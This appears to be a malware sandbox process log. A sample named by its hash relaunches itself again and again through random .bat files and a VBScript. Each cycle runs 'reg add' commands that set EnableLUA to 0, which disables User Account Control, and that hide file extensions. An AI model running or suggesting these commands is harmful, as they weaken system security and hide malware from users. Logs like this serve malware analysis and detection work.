reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\paIMAsIs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oAgkcOEw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MSkcAgQU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\umQAcQcE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yqUAgYEs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zMwwMUgk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fKscYEIY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BgsIMwcw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uOcswYYM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ccQssQMw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uWEwMAoI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sSsQUAwA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TWcgwkQI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XuMEIUcg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hWgcwowI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TyIwIAkA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SQogEsQE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IWkkcYcI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wAoIAYIg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vAEYcQIQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lAgUwkUY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xEQoUIcs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
